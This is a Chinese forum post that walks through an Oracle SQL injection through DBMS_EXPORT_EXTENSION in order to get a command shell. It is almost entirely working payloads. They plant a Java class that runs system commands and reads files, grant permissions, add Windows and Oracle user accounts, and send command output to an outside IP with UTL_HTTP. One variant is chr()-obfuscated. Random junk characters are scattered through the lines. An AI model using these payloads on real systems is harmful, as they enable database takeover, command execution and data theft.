找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2309|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
* R. d+ I- l( c" y$ B0 j& b% J& W; E0 l7 i
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) % u! c$ q# }) k$ A. f5 }
的形式即可。(用" 'a'|| "是为了让语句返回true值) 5 j+ ?& Y0 b; {' }
语句有点长,可能要用post提交。
3 f5 k. s3 \: `7 ^: Q* c以下是各个步骤:
- X* _8 y: {  S1 g) f! Y1.创建包 5 Y. `% H* O5 \7 G- e% {, Q
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
8 k& x) r5 ~& B/xxx.jsp?id=1 and '1'<>'a'||(
( P: l( d; o$ Q/ \# Eselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
9 |( J* s- H; l2 |; r' B# V' ocreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
! b" Q7 @, A  A, N: d, Hnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
. F- `: S3 Y8 C( u}'''';END;'';END;--','SYS',0,'1',0) from dual
+ p1 q& c/ I& c1 J" l)
0 w- Z" P' |8 e( `. m: `7 l6 g$ z------------------------
& ^) Y$ H. x( m0 i# `如果url有长度限制,可以把readFile()函数块去掉,即:
& |# {% n1 a. c4 D; Q/ m/xxx.jsp?id=1 and '1'<>'a'||( % r- s- e& x. R- I  c
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- ?0 ?- S8 x% p/ Y; jcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(9 V4 ^6 v+ K& E
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}& _6 K( @2 ^* c# P# q+ d* i
}'''';END;'';END;--','SYS',0,'1',0) from dual
3 d5 X4 x  a( W) S$ E7 U)
4 k( E; W' q2 R% c同时把后面步骤 提到的 对readFile()的处理语句去掉。 0 E! y% }0 R: ?* C/ q- @
------------------------------ ! Y7 ]' d' v& q0 C7 @( G2 k2 H
2.赋Java权限 0 ]3 N" |6 V3 o: e8 H) N
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual, g" p- @2 b, w! Z, w) f1 p
3.创建函数
; I9 W  F9 F" r5 T4 Iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 M4 n% e. D+ {# F( I% Zcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
$ i6 c; D' {6 N& F* c* o' X9 a3 z, Xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
6 h7 m) L- u; @4 Rcreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
8 j( B1 T: X; a8 u( u. u4.赋public执行函数的权限 % s: Q+ `3 w' m7 I
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual2 ?. [5 u. Q5 o0 r3 q4 W5 e  E
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual; Q+ o+ M: Z0 D. Y, M! f5 m
5.测试上面的几步是否成功
' _& \5 H5 ]; _and '1'<>'11'||(
4 I7 m! @0 W7 s8 h# dselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
- g5 L; Z2 c, c7 Z7 k+ L/ |) * i; U& k6 A( b- h9 L' J  j$ ]
and '1'<>(
3 l  o, _) f9 I3 r; J) T+ [select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
0 p* @+ W* t8 b)
' O; F2 f- [3 S4 O6.执行命令: 3 n$ F  z8 a) m% ~
/xxx.jsp?id=1 and '1'<>(
4 `, ]: u. }. t$ G; ?9 |6 B5 Cselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual
* I. {: Z. }& D& v5 k8 e) k0 u! h- s1 p
) ! v4 i1 F4 D, z  ~; T/ D4 E
/xxx.jsp?id=1 and '1'<>( % R) n; ~) M- h6 F. J' d
select  sys.LinxReadFile('c:/boot.ini') from dual
, n+ u; |- f& e% b
! `! }. ]) y5 J) P)! M9 `; |/ O" P* {
  3 x( B  a; ~( I
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
- ^9 v4 N# X* S/ C7 c- Q如果要查看运行结果可以用 union : ; F3 a7 X" b7 X) x% n
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual; n) w9 R, @) }$ v+ x- d
或者UTL_HTTP.request(: 9 @2 ?2 C1 k2 r( z3 t
/xxx.jsp?id=1 and '1'<>(
* t9 z6 E9 f6 f" X# h; X0 N: RSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
2 m2 x' I" H4 L' z+ B)
! x: c4 b6 d) o+ o+ Z6 C5 w, _7 V/xxx.jsp?id=1 and '1'<>(
9 s2 o3 B+ |- T$ G$ Z) H! X6 _SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
2 _" D$ s9 r: x! E2 s. z! i8 b+ n)
( [1 Z1 ~5 Q& k. z7 Z( A/ H注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。. e' r9 B( H8 e5 r9 p7 C3 r
--------------------
- \3 ~; y' T3 l+ a: ]9 g6.内部变化 & S7 Z7 O7 u. ^7 l' m  l2 f
通过以下命令可以查看all_objects表达改变:
8 {$ \, t; o) c3 O0 J/ x3 Rselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
% P6 D8 L4 D% N$ v: x7.删除我们创建的函数
) m$ [9 o9 F4 ?select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
3 N5 V- e# N8 \" e. }8 Pdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual 7 R1 ~1 D, L% \5 I% k  P
====================================================
, J' K& E$ j9 s+ b- r1 E全文结束。谨以此文赠与我的朋友。
- ~$ Z0 e' r- G  @0 ~! b2 Elinx
* n6 J* N5 [9 E% k8 e# @124829445 ! [* E8 Z4 {6 d9 h2 K4 H
2008.1.12 ' f8 f* _! H( H% C
linyujian@bjfu.edu.cn
) G% r  a0 T0 `/ U+ k1 s====================================================================== ( D4 U3 F5 z, I, T, B2 s& i5 }
测试漏洞的另一方法:
. X; S1 b5 L$ a1 @+ v0 {创建oracle帐号:
2 A5 E: t; p) ~( a; ]: vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''; I7 `- l1 c0 B; R. o. j7 A5 H, |
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual! f/ T5 B* f2 U; ^6 h2 _, n
即: ( ^& R9 j! C# \1 z
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),3 Z/ O* x8 a) q4 |8 x$ t
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
/ ^, K. `% D7 B+ X" ~确定漏洞存在:
3 t+ r& f. m. d6 n" b: W- c0 j/ [1<>( 7 x$ B' b8 u; g% V) O3 h6 @5 L9 X/ ~
select user_id from all_users where username='LINXSQL'
8 V. Y' D- f, M. Y! A5 X+ G8 o7 p# h)
) {7 @) J$ s7 Z6 E  F给linxsql连接权限: , ?  ^, m7 H4 q3 B0 H+ E" Q0 e
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
; S1 N4 }; Y2 X4 C, dGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual ) X; g1 w' w& s9 T% d/ J& d! m
删除帐号:
* b6 }) @+ d3 d( ~! v, mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
/ _- @  V) r/ i2 gdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
, Q$ Y1 V* Y2 Q8 m" o9 N3 d======================
, A! l/ d, U* S9 z1 T: x以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:: b* K$ I, c5 s2 B& ]
1.jsp?id=1 and '1'<>( , m) v- y9 Q7 f
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 G$ |. x. ^- ]# d
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
4 \0 P: c" m( _& B) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
; @% m4 t! [5 q( t )
7 |- r" ~# g% E) \- r0 N: w. `$ S1 x" D& w

( ]& x5 M6 e2 x9 o/ z0 Z6 E" x/ V* ~5 ?$ m  S! \+ @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表